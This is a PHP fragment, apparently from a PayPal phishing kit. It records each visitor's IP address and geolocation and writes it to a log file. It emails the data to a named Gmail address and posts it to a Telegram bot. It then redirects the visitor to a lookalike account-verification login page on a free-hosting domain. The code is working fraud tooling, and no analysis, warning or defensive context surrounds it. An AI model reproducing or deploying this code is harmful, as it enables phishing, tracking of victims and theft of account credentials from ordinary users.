country . "\r\n"; $CITY = $IP_LOOKUP->city . "\r\n"; $REGION = $IP_LOOKUP->region . "\r\n"; $STATE = $IP_LOOKUP->regionName . "\r\n"; $ZIPCODE = $IP_LOOKUP->zip . "\r\n"; $msg="\n=== Your [ Paypal-1 Link was Click From : ] ===\n".$ip."\nCountry : ".$COUNTRY."City: " .$CITY."Region : " .$REGION."State: " .$STATE."Zip : " .$ZIPCODE; # ========= To TXT FILE ================ # $flogs = fopen("newVisitor.txt","a"); fwrite($flogs, $msg); fclose($flogs); # ========================= # # ========= To Email ================ # // $email ="marielund734@gmail.com"; $subject = "[Paypal-1 Link was Click From : ]-".$COUNTRY."$ip"; $headers = 'Bravo Hacking Lab'; @mail($email,$subject,$msg,$headers); # ========================= # # ========= TO TELEGRAM RESULT ================ # file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($msg)."" ); $scammurl = "https://accountverificationj.rf.gd/scorexxxx/login.php"; exit(header("Location:$scammurl"));
Loading...